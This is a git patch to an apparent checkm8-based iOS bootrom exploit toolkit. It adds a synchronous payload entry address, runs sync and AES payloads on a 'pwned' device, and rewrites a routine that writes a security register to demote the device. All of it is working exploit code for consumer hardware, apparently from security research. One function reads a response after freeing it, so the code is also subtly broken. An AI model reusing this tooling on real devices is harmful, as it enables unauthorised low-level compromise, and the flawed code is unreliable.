From 8b25a00bd4c0b39837933883c716a891f8189f9a Mon Sep 17 00:00:00 2001 From: Gregor Haas Date: Tue, 11 Feb 2020 15:10:35 -0500 Subject: [PATCH] synchronous payloads seem to work well --- c8_remote/include/bootrom_addr.h | 1 + c8_remote/lib/payload/payload_entry.c | 3 +- c8_remote/main.c | 11 +++- c8_remote/src/exploit.c | 92 ++++++++++++++++++--------- 4 files changed, 74 insertions(+), 33 deletions(-) diff --git a/c8_remote/include/bootrom_addr.h b/c8_remote/include/bootrom_addr.h index 678e6ce..9150529 100644 --- a/c8_remote/include/bootrom_addr.h +++ b/c8_remote/include/bootrom_addr.h @@ -36,6 +36,7 @@ /* Misc */ #define ADDR_RANDOM_RET 0x10000b924 +#define ADDR_SYNC_ENTRY 0x1800afc84 #define ADDR_DFU_RETVAL (int *) 0x180088ac8 #define ADDR_DFU_STATUS (unsigned char *) 0x180088ac0 diff --git a/c8_remote/lib/payload/payload_entry.c b/c8_remote/lib/payload/payload_entry.c index 09d6e2d..20dc157 100644 --- a/c8_remote/lib/payload/payload_entry.c +++ b/c8_remote/lib/payload/payload_entry.c @@ -1,3 +1,4 @@ +#include "bootrom_addr.h" #include "dev_util.h" extern uint64_t entry_sync(uint64_t *args); @@ -10,7 +11,7 @@ uint64_t _start(uint64_t arg0, uint64_t arg1, uint64_t arg2, uint64_t arg3, uint64_t entry, args[8]; __asm__ volatile ("mov %0, x30" : "=r" (entry)); - if(entry == 0xbea /* todo: correct entry */) + if(entry == ADDR_SYNC_ENTRY /* todo: correct entry */) { args[0] = arg0; args[1] = arg1; diff --git a/c8_remote/main.c b/c8_remote/main.c index 52997f4..ad8e954 100644 --- a/c8_remote/main.c +++ b/c8_remote/main.c @@ -235,6 +235,13 @@ void aes_sw(struct pwned_device *dev) return; } + resp = execute_payload(dev, PAYLOAD_SYNC, 0, 0); + if(IS_CHECKM8_FAIL(resp->ret)) + { + printf("failed to execute sync payload\n"); + return; + } + for(i = 0; i < 100; i++) { resp = execute_payload(dev, PAYLOAD_AES_SW, 0, 7, @@ -341,9 +348,7 @@ int main() demote_device(dev); - // usb_task_exit(dev); - - floppysleep(dev); + aes_sw(dev); free_device(dev); } diff --git a/c8_remote/src/exploit.c b/c8_remote/src/exploit.c index 494c5d7..cf2350d 100644 --- a/c8_remote/src/exploit.c +++ b/c8_remote/src/exploit.c @@ -294,6 +294,13 @@ int demote_device(struct pwned_device *dev) { checkm8_debug_indent("demote_device(dev = %p)\n", dev); unsigned int oldval, newval; + int retval; + + if(IS_CHECKM8_FAIL(open_device_session(dev))) + { + checkm8_debug_indent("\tfailed to open a device session\n"); + return CHECKM8_FAIL_XFER; + } struct dev_cmd_resp *resp = dev_read_memory(dev, DEMOTE_REG, 4); if(IS_CHECKM8_FAIL(resp->ret)) @@ -305,46 +312,73 @@ int demote_device(struct pwned_device *dev) oldval = *((unsigned int *) resp->data); free_dev_cmd_resp(resp); - if(oldval & 1u) + if(!(oldval & 1u)) { - oldval &= 0xFFFFFFFE; + checkm8_debug_block("\tdevice already demoted\n"); + if(IS_CHECKM8_FAIL(close_device_session(dev))) + { + checkm8_debug_indent("\tfailed to close device session\n"); + return CHECKM8_FAIL_XFER; + } - checkm8_debug_indent("\tattempting to demote device\n"); - resp = dev_write_memory(dev, DEMOTE_REG, (unsigned char *) &oldval, 4); + return CHECKM8_SUCCESS; + } + + oldval &= 0xFFFFFFFE; + + checkm8_debug_indent("\tattempting to demote device\n"); + resp = dev_write_memory(dev, DEMOTE_REG, (unsigned char *) &oldval, 4); + free_dev_cmd_resp(resp); + if(IS_CHECKM8_FAIL(resp->ret)) + { + checkm8_debug_block("\tfailed to write to demotion reg\n"); + + if(IS_CHECKM8_FAIL(close_device_session(dev))) + { + checkm8_debug_indent("\tfailed to close device session\n"); + return CHECKM8_FAIL_XFER; + } + + return CHECKM8_FAIL_INVARGS; + } + + // verify + resp = dev_read_memory(dev, DEMOTE_REG, 4); + if(IS_CHECKM8_FAIL(resp->ret)) + { free_dev_cmd_resp(resp); - if(IS_CHECKM8_FAIL(resp->ret)) + checkm8_debug_block("\tfailed to verify demotion reg\n"); + + if(IS_CHECKM8_FAIL(close_device_session(dev))) { - checkm8_debug_block("\tfailed to write to demotion reg\n"); - return CHECKM8_FAIL_INVARGS; + checkm8_debug_indent("\tfailed to close device session\n"); + return CHECKM8_FAIL_XFER; } - // verify - resp = dev_read_memory(dev, DEMOTE_REG, 4); - if(IS_CHECKM8_FAIL(resp->ret)) - { - free_dev_cmd_resp(resp); - checkm8_debug_block("\tfailed to verify demotion reg\n"); - return CHECKM8_FAIL_INVARGS; - } + return CHECKM8_FAIL_INVARGS; + } - newval = *((unsigned int *) resp->data); - free_dev_cmd_resp(resp); - if(oldval == newval) - { - checkm8_debug_block("\tdemotion success!\n"); - return CHECKM8_SUCCESS; - } - else - { - checkm8_debug_block("\tdemotion register did not change!\n"); - return CHECKM8_FAIL_INVARGS; - } + newval = *((unsigned int *) resp->data); + free_dev_cmd_resp(resp); + + if(oldval == newval) + { + checkm8_debug_block("\tdemotion success!\n"); + retval = CHECKM8_SUCCESS; } else { - checkm8_debug_block("\tdevice already demoted\n"); - return CHECKM8_SUCCESS; + checkm8_debug_block("\tdemotion register did not change!\n"); + retval = CHECKM8_FAIL_INVARGS; } + + if(IS_CHECKM8_FAIL(close_device_session(dev))) + { + checkm8_debug_indent("\tfailed to close device session\n"); + return CHECKM8_FAIL_XFER; + } + + return retval; } void free_device(struct pwned_device *dev)